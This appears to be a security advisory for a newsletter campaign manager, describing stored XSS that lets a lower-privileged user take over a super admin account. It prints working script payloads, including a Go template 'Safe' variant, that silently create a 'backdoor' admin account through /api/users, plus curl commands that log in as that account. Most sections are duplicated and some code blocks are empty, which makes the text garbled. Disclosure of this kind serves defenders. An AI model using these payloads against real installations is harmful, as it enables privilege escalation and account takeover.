\n```\n\n### Vector 2: Go Template `Safe` Function\n\n```\n{{ `` | Safe }}\n```\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Campaign Preview Attack\n\n1. Attacker creates campaign with XSS payload\n2. Request is made to super admin: *\"Please review my newsletter draft\"*\n3. Super admin opens campaign and clicks **Preview**\n4. XSS executes → Backdoor admin account created\n5. Attacker logs in with `backdoor` / `Hacked123`\n\n### Scenario 2: Archive Link Attack (No Click Required)\n\n1. Attacker creates campaign with XSS payload\n2. Attacker enables **Archive** for the campaign\n3. Attacker shares archive link: `http://localhost:9000/archive/{uuid}`\n4. Super admin visits the link (no preview click needed!)\n5. XSS executes automatically → Account takeover\n\n---\n\n## Proof of Concept\n\n### Step 1: Create Malicious Campaign\n\nAs lower-privileged user, create campaign with body:\n```html\n\n```\n\n### Step 2: Enable Archive (Optional - for link-based attack)\n\n1. Edit campaign settings\n2. Enable \"Archive\"\n3. Copy archive URL: `http://localhost:9000/archive/{campaign-uuid}`\n\n### Step 3: Trigger Execution\n\n**Option A - Preview:**\n- Send campaign to super admin for \"review\"\n- Super admin previews → XSS fires\n\n**Option B - Archive Link:**\n- Share archive URL with super admin\n- Super admin visits link → XSS fires automatically\n\n### Step 4: Verify Takeover\n\n```bash\n# Login as backdoor admin\ncurl -X POST \"http://localhost:9000/admin/login\" \\\n -d \"username=backdoor&password=Hacked123\" \\\n -c cookies.txt -L\n\n# Verify super admin access\ncurl -b cookies.txt \"http://localhost:9000/api/users\"\n```\n\n---\n\n## Evidence Screenshots\n\n> **[Screenshot 1: Lower-privileged user creating malicious campaign]**\n\n\n> **[Screenshot 2: Super admin previewing campaign]**\n\n\n> **[Screenshot 3: Backdoor user successfully created]**\n\n\n---\n\n## Impact\n\n| Action | Possible via XSS |\n|--------|-----------------|\n| Create backdoor admin | ✅ Yes |\n| Export all subscribers | ✅ Yes |\n| Modify SMTP settings | ✅ Yes |\n| Delete all campaigns | ✅ Yes |\n| Access API keys/secrets | ✅ Yes |\n\n---\n\n## Affected Components\n\n| Component | XSS Works? | Method |\n|-----------|-----------|--------|\n| Campaign body (Raw HTML) | ✅ Yes | Direct `\n```\n\n### Vector 2: Go Template `Safe` Function\n\n```\n{{ `` | Safe }}\n```\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Campaign Preview Attack\n\n1. Attacker creates campaign with XSS payload\n2. Request is made to super admin: *\"Please review my newsletter draft\"*\n3. Super admin opens campaign and clicks **Preview**\n4. XSS executes → Backdoor admin account created\n5. Attacker logs in with `backdoor` / `Hacked123`\n\n### Scenario 2: Archive Link Attack (No Click Required)\n\n1. Attacker creates campaign with XSS payload\n2. Attacker enables **Archive** for the campaign\n3. Attacker shares archive link: `http://localhost:9000/archive/{uuid}`\n4. Super admin visits the link (no preview click needed!)\n5. XSS executes automatically → Account takeover\n\n---\n\n## Proof of Concept\n\n### Step 1: Create Malicious Campaign\n\nAs lower-privileged user, create campaign with body:\n```html\n\n```\n\n### Step 2: Enable Archive (Optional - for link-based attack)\n\n1. Edit campaign settings\n2. Enable \"Archive\"\n3. Copy archive URL: `http://localhost:9000/archive/{campaign-uuid}`\n\n### Step 3: Trigger Execution\n\n**Option A - Preview:**\n- Send campaign to super admin for \"review\"\n- Super admin previews → XSS fires\n\n**Option B - Archive Link:**\n- Share archive URL with super admin\n- Super admin visits link → XSS fires automatically\n\n### Step 4: Verify Takeover\n\n```bash\n# Login as backdoor admin\ncurl -X POST \"http://localhost:9000/admin/login\" \\\n -d \"username=backdoor&password=Hacked123\" \\\n -c cookies.txt -L\n\n# Verify super admin access\ncurl -b cookies.txt \"http://localhost:9000/api/users\"\n```\n\n---\n\n## Evidence Screenshots\n\n> **[Screenshot 1: Lower-privileged user creating malicious campaign]**\n\n\n> **[Screenshot 2: Super admin previewing campaign]**\n\n\n> **[Screenshot 3: Backdoor user successfully created]**\n\n\n---\n\n## Impact\n\n| Action | Possible via XSS |\n|--------|-----------------|\n| Create backdoor admin | ✅ Yes |\n| Export all subscribers | ✅ Yes |\n| Modify SMTP settings | ✅ Yes |\n| Delete all campaigns | ✅ Yes |\n| Access API keys/secrets | ✅ Yes |\n\n---\n\n## Affected Components\n\n| Component | XSS Works? | Method |\n|-----------|-----------|--------|\n| Campaign body (Raw HTML) | ✅ Yes | Direct `

campaigns:manage    - Create/edit campaigns
campaigns:get       - View campaigns  
lists:get_all       - Access lists
templates:get       - Access templates

<script>
fetch('/api/users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  credentials: 'include',
  body: '{"username":"backdoor","email":"[email protected]","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'
});
</script>

{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"[email protected]","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'});</script>` | Safe }}

<script>
fetch('/api/users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  credentials: 'include',
  body: JSON.stringify({
    username: 'backdoor',
    email: '[email protected]', 
    name: 'Backdoor Admin',
    password: 'Hacked123',
    type: 'user',
    status: 'enabled',
    userRoleId: 1,
    user_role_id: 1
  })
});
</script>

# Login as backdoor admin
curl -X POST "http://localhost:9000/admin/login" \
  -d "username=backdoor&password=Hacked123" \
  -c cookies.txt -L

# Verify super admin access
curl -b cookies.txt "http://localhost:9000/api/users"